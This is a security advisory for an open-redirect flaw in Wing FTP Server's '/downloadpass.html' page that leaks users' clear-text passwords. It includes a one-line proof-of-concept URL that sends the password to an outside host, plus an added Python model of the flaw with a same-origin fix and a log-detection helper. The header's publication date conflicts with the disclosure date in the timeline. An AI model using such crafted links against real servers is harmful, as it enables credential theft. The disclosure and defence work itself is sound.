ADVISORY INFORMATION

  • Product: Wing FTP Server
  • Vendor URL: https://www.wftpserver.com
  • CWE: URL Redirection to Untrusted Site [CWE-601]
  • Date found: 2025-03-10
  • Date published: 2025-04-26
  • CVSSv4 Score: 7.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N)
  • CVE: CVE-2025-27889

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Wing FTP Server <= 7.4.2

INTRODUCTION

Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The endpoint at “/downloadpass.html” uses the value of its “url” query parameter as the link the user is sent to after the form is submitted, without restricting that value to the server's own origin (arbitrary link injection). A protocol-relative value such as the “//rcesecurity.com/…” used in the proof of concept below is resolved by the browser to an absolute URL on that foreign host. An attacker only needs to trick a victim into following a crafted link to the endpoint. Once the user enters their password on the resulting page and proceeds by hitting the “Submit” button, a vulnerable version of Wing FTP Server automatically appends the user's clear-text password to the link injected via the “url” parameter, so the password is delivered to the attacker-controlled destination.

Successful exploits can allow an unauthenticated attacker to steal a user’s clear-text password and subsequently compromise their account.

PROOF OF CONCEPT

A payload to exploit this vulnerability looks like the following. The “?” and “&” of the attacker's link are percent-encoded (%3f and %26) so that they stay part of the “url” parameter value instead of terminating it:

/downloadpass.html?url=//rcesecurity.com/file%3fdownload%26weblink%3drcesec
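The following Python model is added here as an illustration and is not Wing FTP Server's code; the advisory does not show the handler's implementation. It walks the proof-of-concept request through the behaviour described under VULNERABILITY DETAILS: it decodes the “url” parameter the way a web server would, shows where the vulnerable redirect delivers the submitted password, and contrasts that with a hardened same-origin check of the kind that closes CWE-601, plus a small helper for flagging such requests in access-log review. The server origin https://ftp.example.com, the function names and the “password” query key are assumptions. The hardened check goes slightly beyond the single payload on this page by also rejecting absolute URLs and the backslash and control-character variants that browsers normalise to “//”.

```python
"""Model of the /downloadpass.html 'url' handling described in the advisory.

Added illustration only: this is not Wing FTP Server's code. The server origin,
the function names and the 'password' query key are assumptions.
"""
from typing import Optional
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit

SERVER_ORIGIN = "https://ftp.example.com"  # assumed origin of the web UI

# Proof-of-concept request target from the advisory, copied verbatim.
POC_REQUEST = "/downloadpass.html?url=//rcesecurity.com/file%3fdownload%26weblink%3drcesec"


def url_param(request_target: str) -> str:
    """Return the percent-decoded 'url' query parameter as a web server sees it."""
    query = urlsplit(request_target).query
    return parse_qs(query).get("url", [""])[0]


def vulnerable_redirect(url_value: str, password: str) -> str:
    """Model of the pre-7.4.3 behaviour: the clear-text password is appended
    to whatever 'url' held and the browser is sent there. A protocol-relative
    value (//host/...) resolves to an absolute URL on that host, so the
    credential leaves the server's origin."""
    separator = "&" if "?" in url_value else "?"
    return urljoin(SERVER_ORIGIN, url_value + separator + urlencode({"password": password}))


def safe_target(url_value: str) -> Optional[str]:
    """Hardened form: accept only a local path and return its absolute,
    same-origin URL; return None for anything that could leave the origin."""
    # Browsers strip ASCII control characters (tab, CR, LF) before parsing,
    # so '/\t/evil' becomes '//evil'. Refuse them outright.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url_value):
        return None
    # A local path starts with exactly one forward slash: '//' is
    # protocol-relative, and '/\' is treated like '//' by some browsers.
    if not url_value.startswith("/") or url_value.startswith(("//", "/\\")):
        return None
    if "\\" in url_value:
        return None
    resolved = urljoin(SERVER_ORIGIN, url_value)
    # The resolved URL must still point at our own host.
    if urlsplit(resolved).netloc != urlsplit(SERVER_ORIGIN).netloc:
        return None
    return resolved


def is_open_redirect_attempt(request_target: str) -> bool:
    """Detection helper for access-log review: flags a /downloadpass.html
    request whose 'url' parameter the hardened check would refuse."""
    if urlsplit(request_target).path != "/downloadpass.html":
        return False
    value = url_param(request_target)
    return bool(value) and safe_target(value) is None


if __name__ == "__main__":
    value = url_param(POC_REQUEST)
    print("decoded url parameter:", value)
    print("vulnerable redirect:  ", vulnerable_redirect(value, "s3cret"))
    print("hardened target:      ", safe_target(value))
    print("flagged:              ", is_open_redirect_attempt(POC_REQUEST))
```

Running the model against the proof-of-concept request shows the decoded parameter as “//rcesecurity.com/file?download&weblink=rcesec”, the vulnerable redirect landing on https://rcesecurity.com with the password appended as a query parameter, and the hardened check refusing the value while still accepting a plain local path such as “/file?download&weblink=rcesec”.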

SOLUTION

Update to version 7.4.3

REPORT TIMELINE

  • 2025-03-10: Discovery of the vulnerability
  • 2025-03-10: MITRE assigns CVE-2025-27889
  • 2025-03-10: Contacted the vendor via their support@
  • 2025-03-10: Vendor responds giving details on how to report the bug
  • 2025-03-11: Sent full vulnerability details to the vendor
  • 2025-03-11: Vendor confirms the vulnerability
  • 2025-03-30: Vendor releases version 7.4.3 which fixes the vulnerability
  • 2025-06-30: Full Disclosure

REFERENCES